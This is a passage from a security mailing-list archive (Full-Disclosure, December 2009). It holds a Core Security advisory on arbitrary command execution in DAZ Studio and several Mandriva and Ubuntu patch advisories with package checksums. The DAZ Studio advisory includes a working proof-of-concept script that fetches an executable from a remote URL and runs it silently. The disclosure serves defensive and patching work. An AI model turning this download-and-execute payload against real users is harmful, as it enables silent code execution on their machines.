vulnerability requires user interaction to exploit, its severity was determined to be moderate (CVE-2009-3375). Mozilla security researchers Jesse Ruderman and Sid Stamm reported that when downloading a file containing a right-to-left override character (RTL) in the filename, the name displayed in the dialog title bar conflicts with the name of the file shown in the dialog body. An attacker could use this vulnerability to obfuscate the name and file extension of a file to be downloaded and opened, potentially causing a user to run an executable file when they expected to open a non-executable file (CVE-2009-3376). Mozilla developers and community members identified and fixed several stability bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code. Vladimir Vukicevic, Jesse Ruderman, Martijn Wargers, Daniel Banchero, David Keeler, and Boris Zbarsky reported crashes in the browser engine which affected both Firefox 3 and Firefox 3.5 (CVE-2009-3380). Carsten Book reported a crash in the browser engine which affected only Firefox 3 (CVE-2009-3382). This update provides the latest Mozilla Firefox 3.0.x to correct these issues. Additionally, some packages which require so, have been rebuilt and are being provided as
[Full-disclosure] CORE-2009-0911: DAZ Studio Arbitrary Command Execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ DAZ Studio Arbitrary Command Execution 1. *Advisory Information* Title: DAZ Studio Arbitrary Command Execution Advisory Id: CORE-2009-0911 Advisory URL: http://www.coresecurity.com/content/dazstudio-scripting-injection Date published: 2009-12-02 Date of last update: 2009-12-01 Vendors contacted: DAZ Release mode: User release 2. *Vulnerability Information* Class: Insufficient UI Warning of Dangerous Operations [CWE-357] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: No Bugtraq ID: 37176 CVE Name: CVE-2009-4148 3. *Vulnerability Description* DAZ Studio [2] is a 3D figure illustration/animation application released by DAZ 3D Inc. DAZ Studio can be accessed via a scripting language which allows for quite a bit of diversity in tool creation. DAZ Studio does not ask for any confirmation from the user prior to executing a scripting file with any of the following extensions: .ds, .dsa, .dse, .dsb. An attacker could abuse the scripting interface by enticing an unsuspecting user to open a malicious scripting file, thus obtaining remote code execution. 4. *Vulnerable packages* . DAZ Studio 2.3.3.161 . DAZ Studio 2.3.3.163 . DAZ Studio 3.0.1.135 . Older versions are probably affected too, but they were not checked. 5. *Vendor Information, Solutions and Workarounds* The vendor did not provide fixes or workaround information. To prevent the accidental execution of malicious scripting files you can disable the default file association of the dangerous file extensions in the Windows Explorer. The following KB article from Microsoft describe how to deassociate a file extension. http://support.microsoft.com/kb/307859 6. *Credits* This vulnerability was discovered and researched by Diego Juarez from Core Security Technologies during Bugweek 2009 [1]. 7. *Technical Description / Proof of Concept Code* The following Proof of Concept .ds file demonstrates remote code execution by downloading and executing putty in the context of DAZ Studio. /- // DAZ Studio PoC var oFile = new DzFile("d:\\test.js"); oFile.open(2); oFile.write("s=WScript.CreateObject(\'WScript.Shell\');o=WScript.CreateObject(\'ADODB.Stream\');e=s.Environment(\'Process\');u=\'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe\';b=e.Item(\'TEMP\')+\'agent.exe\';try{x=new ActiveXObject(\'Microsoft.XMLHTTP\');}catch(e){x=new ActiveXObject(\'MSXML2.ServerXMLHTTP\');}if(!x)exit(0);x.open(\'GET\',u,0);x.send(null);d=x.responseBody;o.Type=1;o.Mode=3;o.Open();o.Write(d);o.SaveToFile(b,2);s.Run(b,0);\r\n"); oFile.close() var oProcess = new DzProcess(["wscript", "d:\\test.js"]); oProcess.start(); - -/ 8. *Report Timeline* . 2009-11-06: Core Security Technologies completes a support form trying to reach a security contact from DAZ. . 2009-11-06: Core receives an email saying that Core contact email was not recognised as a registered email. . 2009-11-06: Core completes a registration form to be able to contact the support team. . 2009-11-13: Since DAZ support team didn't respond to any mail, Core contacts CERT trying to obtain a valid security contact at DAZ. . 2009-11-16: CERT acknowledges the comunication, and Core reschedules the advisory to November 30th, 2009 based on CERT recommendations. . 2009-11-18: CERT communicates that the vendor doesn't seem familiar with vulnerability reporting/disclosure, and request additional information about the vulnerability. . 2009-11-18: CERT contacted DAZ four times between 11/16 and 11/30. . 2009-11-19: Core replies that the issue is a script injection vulnerability. . 2009-11-30: DAZ did not wish to provide contact information. . 2009-12-03: The advisory CORE-2009-0911 is published. 9. *References* [1] The author participated in Core Bugweek 2009 as member of the team "Gimbal Lock N Load". [2] DAZ Studio: http://www.daz3d.com/i/software/daz_studio3?_m=d 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most com
[Full-disclosure] [ MDVSA-2009:310 ] openssl
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:310 http://www.mandriva.com/security/ ___ Package : openssl Date: December 3, 2009 Affected: 2008.0 ___ Problem Description: Multiple security vulnerabilities has been identified and fixed in OpenSSL: The dtls1_buffer_record function in ssl/d1_pkt.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allows remote attackers to cause a denial of service (memory consumption) via a large series of future epoch DTLS records that are buffered in a queue, aka DTLS record buffer limitation bug. (CVE-2009-1377) Multiple memory leaks in the dtls1_process_out_of_seq_message function in ssl/d1_both.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allow remote attackers to cause a denial of service (memory consumption) via DTLS records that (1) are duplicates or (2) have sequence numbers much greater than current sequence numbers, aka DTLS fragment handling memory leak. (CVE-2009-1378) Use-after-free vulnerability in the dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL 1.0.0 Beta 2 allows remote attackers to cause a denial of service (openssl s_client crash) and possibly have unspecified other impact via a DTLS packet, as demonstrated by a packet from a server that uses a crafted server certificate (CVE-2009-1379). ssl/s3_pkt.c in OpenSSL before 0.9.8i allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a DTLS ChangeCipherSpec packet that occurs before ClientHello (CVE-2009-1386). The dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL before 1.0.0 Beta 2 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an out-of-sequence DTLS handshake message, related to a fragment bug. (CVE-2009-1387) The NSS library library before 3.12.3, as used in Firefox; GnuTLS before 2.6.4 and 2.7.4; OpenSSL 0.9.8 through 0.9.8k; and other products support MD2 with X.509 certificates, which might allow remote attackers to spooof certificates by using MD2 design flaws to generate a hash collision in less than brute-force time. NOTE: the scope of this issue is currently limited because the amount of computation required is still large (CVE-2009-2409). A regression was found with the self signed certificate signatures checking after applying the fix for CVE-2009-2409. An upstream patch has been applied to address this issue. Packages for 2008.0 are being provided due to extended support for Corporate products. The updated packages have been patched to prevent this. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1377 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1379 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1387 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409 http://marc.info/?l=openssl-cvs&m=124508133203041&w=2 https://qa.mandriva.com/54349 ___ Updated Packages: Mandriva Linux 2008.0: 5e5cebd5417fa8da31e5fb439832f4a9 2008.0/i586/libopenssl0.9.8-0.9.8e-8.4mdv2008.0.i586.rpm 56b10d47a9c0522a1d685851301ec3ed 2008.0/i586/libopenssl0.9.8-devel-0.9.8e-8.4mdv2008.0.i586.rpm c5689cbe8983c60b21f885bb417fa93d 2008.0/i586/libopenssl0.9.8-static-devel-0.9.8e-8.4mdv2008.0.i586.rpm f6998620b5cf142898da1b029e055756 2008.0/i586/openssl-0.9.8e-8.4mdv2008.0.i586.rpm 81ed32097a16b03713c16e46e8fae15a 2008.0/SRPMS/openssl-0.9.8e-8.4mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 4a8bfb0af6be2dc3b998b34692df9c03 2008.0/x86_64/lib64openssl0.9.8-0.9.8e-8.4mdv2008.0.x86_64.rpm a38da1e95cd3883a486cf67312031591 2008.0/x86_64/lib64openssl0.9.8-devel-0.9.8e-8.4mdv2008.0.x86_64.rpm 82fd48fc11975ae589b7818dce0a9973 2008.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8e-8.4mdv2008.0.x86_64.rpm a567f0cc7825b1f73e749d96f50a2f2e 2008.0/x86_64/openssl-0.9.8e-8.4mdv2008.0.x86_64.rpm 81ed32097a16b03713c16e46e8fae15a 2008.0/SRPMS/openssl-0.9.8e-8.4mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for
[Full-disclosure] [USN-863-1] QEMU vulnerability
=== Ubuntu Security Notice USN-863-1 December 03, 2009 qemu-kvm vulnerability https://launchpad.net/bugs/458521 === A security issue affects the following Ubuntu releases: Ubuntu 9.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 9.10: qemu-kvm0.11.0-0ubuntu6.3 After a standard system upgrade you need to restart any QEMU guests to effect the necessary changes. Details follow: It was discovered that QEMU did not properly setup the virtio networking features available to its guests. A remote attacker could exploit this to crash QEMU guests which use virtio networking on Linux kernels earlier than 2.6.26. Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/q/qemu-kvm/qemu-kvm_0.11.0-0ubuntu6.3.diff.gz Size/MD5:48984 14fa43af0ed17b918c50803f91b1480d http://security.ubuntu.com/ubuntu/pool/main/q/qemu-kvm/qemu-kvm_0.11.0-0ubuntu6.3.dsc Size/MD5: 1377 18f25eed2408085a81ad70f39d74a835 http://security.ubuntu.com/ubuntu/pool/main/q/qemu-kvm/qemu-kvm_0.11.0.orig.tar.gz Size/MD5: 4382897 440837a062967102a68e634d57eaf719 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/q/qemu-kvm/kvm_84+dfsg-0ubuntu16+0.11.0+0ubuntu6.3_amd64.deb Size/MD5: 9106 b15b1b8a62f13822a3932abd54a5f924 http://security.ubuntu.com/ubuntu/pool/main/q/qemu-kvm/qemu-kvm_0.11.0-0ubuntu6.3_amd64.deb Size/MD5: 2813520 49b26fe83d6c4a5c9befd6716a3431a9 http://security.ubuntu.com/ubuntu/pool/universe/q/qemu-kvm/qemu-arm-static_0.11.0-0ubuntu6.3_amd64.deb Size/MD5: 636074 d9f0b9d5ff621c8b56b9fca53c0ae5d2 http://security.ubuntu.com/ubuntu/pool/universe/q/qemu-kvm/qemu-kvm-extras_0.11.0-0ubuntu6.3_amd64.deb Size/MD5: 15469258 dd6a9beb5c7d51b43785df232a3a3c40 http://security.ubuntu.com/ubuntu/pool/universe/q/qemu-kvm/qemu_0.11.0-0ubuntu6.3_amd64.deb Size/MD5: 8560 2bb181fcf769aafd08d26aa531bb24a4 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/q/qemu-kvm/kvm_84+dfsg-0ubuntu16+0.11.0+0ubuntu6.3_i386.deb Size/MD5: 9104 0a0a8a786ad29625fe5aa3de79c5cd98 http://security.ubuntu.com/ubuntu/pool/main/q/qemu-kvm/qemu-kvm_0.11.0-0ubuntu6.3_i386.deb Size/MD5: 2592100 3023e22d5e6b3ff51fcf3641cd039e93 http://security.ubuntu.com/ubuntu/pool/universe/q/qemu-kvm/qemu-arm-static_0.11.0-0ubuntu6.3_i386.deb Size/MD5: 558556 5d369da01ec40b1d79b7e015d9982302 http://security.ubuntu.com/ubuntu/pool/universe/q/qemu-kvm/qemu-kvm-extras_0.11.0-0ubuntu6.3_i386.deb Size/MD5: 13984728 5464f6de725b919cdb4bd7252d221016 http://security.ubuntu.com/ubuntu/pool/universe/q/qemu-kvm/qemu_0.11.0-0ubuntu6.3_i386.deb Size/MD5: 8562 3e34c884aff529f95a2975cdb08b2723 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/q/qemu-kvm/kvm_84+dfsg-0ubuntu16+0.11.0+0ubuntu6.3_lpia.deb Size/MD5: 9104 156a8ede19f2d65929e73f119415f1b7 http://ports.ubuntu.com/pool/main/q/qemu-kvm/qemu-kvm_0.11.0-0ubuntu6.3_lpia.deb Size/MD5: 2621316 02b4e9168fdacc9ab8955de557c64a7d http://ports.ubuntu.com/pool/universe/q/qemu-kvm/qemu-arm-static_0.11.0-0ubuntu6.3_lpia.deb Size/MD5: 578522 eb5a953dc2d59c2893656467bc879c25 http://ports.ubuntu.com/pool/universe/q/qemu-kvm/qemu-kvm-extras_0.11.0-0ubuntu6.3_lpia.deb Size/MD5: 14110238 ee2d23ca2c7d25f37e5cb4d315730ad4 http://ports.ubuntu.com/pool/universe/q/qemu-kvm/qemu_0.11.0-0ubuntu6.3_lpia.deb Size/MD5: 8560 7c2df17d8e67444172c9093c28a01d71 signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:309 ] ntp
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:309 http://www.mandriva.com/security/ ___ Package : ntp Date: December 3, 2009 Affected: 2008.0 ___ Problem Description: Multiple vulnerabilities has been found and corrected in ntp: Requesting peer information from a malicious remote time server may lead to an unexpected application termination or arbitrary code execution (CVE-2009-0159). A buffer overflow flaw was discovered in the ntpd daemon's NTPv4 authentication code. If ntpd was configured to use public key cryptography for NTP packet authentication, a remote attacker could use this flaw to send a specially-crafted request packet that could crash ntpd (CVE-2009-1252). Packages for 2008.0 are being provided due to extended support for Corporate products. The updated packages have been patched to prevent this. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0159 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1252 ___ Updated Packages: Mandriva Linux 2008.0: ce17e1c2cf64b1181b1172f3933fe705 2008.0/i586/ntp-4.2.4-10.2mdv2008.0.i586.rpm 66baede7d5a42d16d19639148f5e4d52 2008.0/i586/ntp-client-4.2.4-10.2mdv2008.0.i586.rpm f708723a1ab549c987ad64fa2862eb80 2008.0/i586/ntp-doc-4.2.4-10.2mdv2008.0.i586.rpm fb352aa8910f1bc1319df986769d15ab 2008.0/SRPMS/ntp-4.2.4-10.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: b8519fa3b101a246d35d173745267d6c 2008.0/x86_64/ntp-4.2.4-10.2mdv2008.0.x86_64.rpm dd862d4411bfee35041267817e1e2f0e 2008.0/x86_64/ntp-client-4.2.4-10.2mdv2008.0.x86_64.rpm c38355a0069bc68c50e48726bd5d04e7 2008.0/x86_64/ntp-doc-4.2.4-10.2mdv2008.0.x86_64.rpm fb352aa8910f1bc1319df986769d15ab 2008.0/SRPMS/ntp-4.2.4-10.2mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLF+rdmqjQ0CJFipgRAodXAKC5aT0ePLmbNSalOgR03MecOfci4ACaA4JY Uc/m/wcRzfz3Nbleml90qVQ= =ClV1 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:308 ] gnutls
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:308 http://www.mandriva.com/security/ ___ Package : gnutls Date: December 3, 2009 Affected: 2008.0 ___ Problem Description: Multiple vulnerabilities has been found and corrected in gnutls: gnutls-cli in GnuTLS before 2.6.6 does not verify the activation and expiration times of X.509 certificates, which allows remote attackers to successfully present a certificate that is (1) not yet valid or (2) no longer valid, related to lack of time checks in the _gnutls_x509_verify_certificate function in lib/x509/verify.c in libgnutls_x509, as used by (a) Exim, (b) OpenLDAP, and (c) libsoup (CVE-2009-1417). A vulnerability have been discovered and corrected in GnuTLS before 2.8.2, which could allow man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority (CVE-2009-2730). Packages for 2008.0 are being provided due to extended support for Corporate products. This update fixes this vulnerability. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1417 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2730 ___ Updated Packages: Mandriva Linux 2008.0: b0476297b05fee1e5379a8826905757f 2008.0/i586/gnutls-2.0.0-2.4mdv2008.0.i586.rpm 31f117592b8dcb5c3b80b8fde7d2cf2b 2008.0/i586/libgnutls13-2.0.0-2.4mdv2008.0.i586.rpm f9580a96c2b938a67ffc821b4536ce05 2008.0/i586/libgnutls-devel-2.0.0-2.4mdv2008.0.i586.rpm 2d4a130600be226d1ace20f6de574edb 2008.0/SRPMS/gnutls-2.0.0-2.4mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: c36eb24563dc027a84aee5f7b4e0e792 2008.0/x86_64/gnutls-2.0.0-2.4mdv2008.0.x86_64.rpm 3e58a09629aac586a5f1697063d04421 2008.0/x86_64/lib64gnutls13-2.0.0-2.4mdv2008.0.x86_64.rpm 58fbcf88685697a5a2a7959fbd84420d 2008.0/x86_64/lib64gnutls-devel-2.0.0-2.4mdv2008.0.x86_64.rpm 2d4a130600be226d1ace20f6de574edb 2008.0/SRPMS/gnutls-2.0.0-2.4mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLF+Y3mqjQ0CJFipgRAjwhAJ4qfWW60ocYAHhKFR2tnFdvyjUqNQCeO+K2 DJynsXMpzvrD4rEBCyT14Io= =3onS -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:113-1 ] cyrus-sasl
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:113-1 http://www.mandriva.com/security/ ___ Package : cyrus-sasl Date: December 3, 2009 Affected: 2008.0 ___ Problem Description: Multiple buffer overflows in the CMU Cyrus SASL library before 2.1.23 might allow remote attackers to execute arbitrary code or cause a denial of service application crash) via strings that are used as input to the sasl_encode64 function in lib/saslutil.c (CVE-2009-0688). The updated packages have been patched to prevent this. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0688 ___ Updated Packages: Mandriva Linux 2008.0: 0b5da906226132af2c2ed8270343f557 2008.0/i586/cyrus-sasl-2.1.22-23.1mdv2008.0.i586.rpm de005340f6be93e76feb3d5fe94e2d54 2008.0/i586/libsasl2-2.1.22-23.1mdv2008.0.i586.rpm 3d919ce1d732f655ca6be7a89d434acd 2008.0/i586/libsasl2-devel-2.1.22-23.1mdv2008.0.i586.rpm 540c3b13f892438d8795c17cc89d42bf 2008.0/i586/libsasl2-plug-anonymous-2.1.22-23.1mdv2008.0.i586.rpm d13e5e77f0949d58097eb2f734a10255 2008.0/i586/libsasl2-plug-crammd5-2.1.22-23.1mdv2008.0.i586.rpm 5950850223017fdf5a4b47f0618b55de 2008.0/i586/libsasl2-plug-digestmd5-2.1.22-23.1mdv2008.0.i586.rpm 5f1c9ad40cdf003c28ca1be8381d8029 2008.0/i586/libsasl2-plug-gssapi-2.1.22-23.1mdv2008.0.i586.rpm 08bbfad70b61a514204344a125413e14 2008.0/i586/libsasl2-plug-ldapdb-2.1.22-23.1mdv2008.0.i586.rpm 64386e5dd2a108387dc43379a5513e9c 2008.0/i586/libsasl2-plug-login-2.1.22-23.1mdv2008.0.i586.rpm 6447f2431d59bc5b30345259f276f6b3 2008.0/i586/libsasl2-plug-ntlm-2.1.22-23.1mdv2008.0.i586.rpm 93ae062a1aaab4e973859ef402a5a242 2008.0/i586/libsasl2-plug-otp-2.1.22-23.1mdv2008.0.i586.rpm 91c60f6ec94f4dddc5868588a4b8f68b 2008.0/i586/libsasl2-plug-plain-2.1.22-23.1mdv2008.0.i586.rpm f5a00cdd4639421ca1ee15cc0be63eac 2008.0/i586/libsasl2-plug-sasldb-2.1.22-23.1mdv2008.0.i586.rpm 3d497c02f84a1c3328fdb391643da44c 2008.0/i586/libsasl2-plug-sql-2.1.22-23.1mdv2008.0.i586.rpm 6c88dcfd5ab050abd18f4d2983c79300 2008.0/SRPMS/cyrus-sasl-2.1.22-23.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 80d99cc844c67a2a06759bc1e7cc88db 2008.0/x86_64/cyrus-sasl-2.1.22-23.1mdv2008.0.x86_64.rpm 41b95422b894401eecc2a8681c9dc196 2008.0/x86_64/lib64sasl2-2.1.22-23.1mdv2008.0.x86_64.rpm 50f33da97b5da9b4bc30ec5bc6d1d659 2008.0/x86_64/lib64sasl2-devel-2.1.22-23.1mdv2008.0.x86_64.rpm d4fb022df681b367b8679136f72b592e 2008.0/x86_64/lib64sasl2-plug-anonymous-2.1.22-23.1mdv2008.0.x86_64.rpm 5d927f67880f4aa762fb367d77641721 2008.0/x86_64/lib64sasl2-plug-crammd5-2.1.22-23.1mdv2008.0.x86_64.rpm aed157358368d9ff50959a74fe9c25e4 2008.0/x86_64/lib64sasl2-plug-digestmd5-2.1.22-23.1mdv2008.0.x86_64.rpm 84d23ab14f7382f7c7ea6b5967ef2f40 2008.0/x86_64/lib64sasl2-plug-gssapi-2.1.22-23.1mdv2008.0.x86_64.rpm 9e4e676d2fbd739510acc32c0c43be95 2008.0/x86_64/lib64sasl2-plug-ldapdb-2.1.22-23.1mdv2008.0.x86_64.rpm 4db9412d9b049a07c6cd4a79763d6753 2008.0/x86_64/lib64sasl2-plug-login-2.1.22-23.1mdv2008.0.x86_64.rpm ea10f518bb59213ef01857ea4dc0aa4d 2008.0/x86_64/lib64sasl2-plug-ntlm-2.1.22-23.1mdv2008.0.x86_64.rpm 63d56373895ddc03a85d4dd3ca1f960a 2008.0/x86_64/lib64sasl2-plug-otp-2.1.22-23.1mdv2008.0.x86_64.rpm 4b655bbd94e9693ea9f57811bd0efad3 2008.0/x86_64/lib64sasl2-plug-plain-2.1.22-23.1mdv2008.0.x86_64.rpm 5050def960a29e2857cd132785a21143 2008.0/x86_64/lib64sasl2-plug-sasldb-2.1.22-23.1mdv2008.0.x86_64.rpm febdbe8c8c23b096a78ea20dc8ceca75 2008.0/x86_64/lib64sasl2-plug-sql-2.1.22-23.1mdv2008.0.x86_64.rpm 6c88dcfd5ab050abd18f4d2983c79300 2008.0/SRPMS/cyrus-sasl-2.1.22-23.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.
[Full-disclosure] [ MDVSA-2009:112-1 ] ipsec-tools
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:112-1 http://www.mandriva.com/security/ ___ Package : ipsec-tools Date: December 3, 2009 Affected: 2008.0 ___ Problem Description: racoon/isakmp_frag.c in ipsec-tools before 0.7.2 allows remote attackers to cause a denial of service (crash) via crafted fragmented packets without a payload, which triggers a NULL pointer dereference (CVE-2009-1574). Updated packages are available that brings ipsec-tools to version 0.7.2 for Mandriva Linux 2008.1/2009.0/2009.1 which provides numerous bugfixes over the previous 0.7.1 version, and also corrects this issue. ipsec-tools for Mandriva Linux Corporate Server 4 has been patched to address this issue. Additionally the flex package required for building ipsec-tools has been fixed due to ipsec-tools build problems and is also available with this update. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1574 ___ Updated Packages: Mandriva Linux 2008.0: 8256debb7fe84394de70499907060de6 2008.0/i586/flex-2.5.33-2.1mdv2008.0.i586.rpm c03c0f9fe8f564ea777b82789ac95f41 2008.0/i586/ipsec-tools-0.7.2-0.1mdv2008.0.i586.rpm 9da2195c693a7fe40f7afb3c5806aaca 2008.0/i586/libipsec0-0.7.2-0.1mdv2008.0.i586.rpm 29dcc9414a59cba30ce801b9fef416a6 2008.0/i586/libipsec-devel-0.7.2-0.1mdv2008.0.i586.rpm b3c8a3a36388d02426b77a45d862 2008.0/SRPMS/flex-2.5.33-2.1mdv2008.0.src.rpm b0cb7993f29eac3d5f170c7cd3cf0cb5 2008.0/SRPMS/ipsec-tools-0.7.2-0.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 36c5d0eb92197c814b90c814d21d3372 2008.0/x86_64/flex-2.5.33-2.1mdv2008.0.x86_64.rpm 7a976c988badcb9fae93509acfe99aa2 2008.0/x86_64/ipsec-tools-0.7.2-0.1mdv2008.0.x86_64.rpm 85b8ed6e328b048c13eb503bfee8dcdc 2008.0/x86_64/lib64ipsec0-0.7.2-0.1mdv2008.0.x86_64.rpm a22f34f1cfac38c9029eb032e3257285 2008.0/x86_64/lib64ipsec-devel-0.7.2-0.1mdv2008.0.x86_64.rpm b3c8a3a36388d02426b77a45d862 2008.0/SRPMS/flex-2.5.33-2.1mdv2008.0.src.rpm b0cb7993f29eac3d5f170c7cd3cf0cb5 2008.0/SRPMS/ipsec-tools-0.7.2-0.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLF9S3mqjQ0CJFipgRAvt/AKDfzDyHHqoCZiMoxKn8Ik2xAqIfsgCfXaCL 6Jl97rfN27eup9AJRmyBBJc= =2nWo -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:108-1 ] zsh
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:108-1 http://www.mandriva.com/security/ ___ Package : zsh Date: December 3, 2009 Affected: 2008.0 ___ Problem Description: A stack-based buffer overflow was found in the zsh command interpreter. An attacker could use this flaw to cause a denial of service (zsh crash), when providing a specially-crafted string as input to the zsh shell. The updated packages have been patched to prevent this. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ Updated Packages: Mandriva Linux 2008.0: 341fdf8d837fd349186b42db36cb6b5d 2008.0/i586/zsh-4.3.4-4.1mdv2008.0.i586.rpm 1fe0e1d84da10a334c70a9808d4fffd7 2008.0/i586/zsh-doc-4.3.4-4.1mdv2008.0.i586.rpm ca28c7f0b98d79f7f7e7e7c93b9afb2e 2008.0/SRPMS/zsh-4.3.4-4.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 65c003211e382a0059eb61ec7249bff9 2008.0/x86_64/zsh-4.3.4-4.1mdv2008.0.x86_64.rpm e784e85b82d32d672e56050972f004c2 2008.0/x86_64/zsh-doc-4.3.4-4.1mdv2008.0.x86_64.rpm ca28c7f0b98d79f7f7e7e7c93b9afb2e 2008.0/SRPMS/zsh-4.3.4-4.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: 